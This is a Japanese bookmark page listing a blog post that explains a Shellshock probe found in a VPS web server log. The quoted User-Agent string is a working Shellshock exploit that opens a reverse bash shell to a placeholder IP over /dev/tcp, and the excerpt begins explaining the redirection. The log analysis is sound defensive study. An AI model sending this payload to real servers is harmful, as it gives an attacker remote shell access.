タグ

関連タグで絞り込む (2)

タグの絞り込みを解除

裏技とUDPに関するiwwのブックマーク (1)

  • bashでリダイレクトを使ったソケット通信 - うまいぼうぶろぐ

    vpsのhttpdのログにbash脆弱性を狙ったアクセスが来ていて、たいていはどこかへpingを実行したり、HTTPヘッダにX-Bash-Test というのを含めて脆弱性を確認してるだけ、みたいなのだけど、その中で見慣れないログを見つけた。 User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.0.2.1/8080 0>&1(/dev/tcp の後は/ipアドレス/port 上のは適当な例) /dev/tcp ? こいつは何がしたい? "/bin/bash -i >& /dev/tcp/192.0.2.1/8080 0>&1" /bin/bash -i を実行したときの標準入力(0)、標準出力(1)、標準エラー(2) 、つまり全ての入出力を/dev/tcp/192.0.2.1/8080 にリダイレクトにしている。(">& hoge.txt"

    bashでリダイレクトを使ったソケット通信 - うまいぼうぶろぐ
    iww
    iww 2020/10/15
    便利そう
  • 1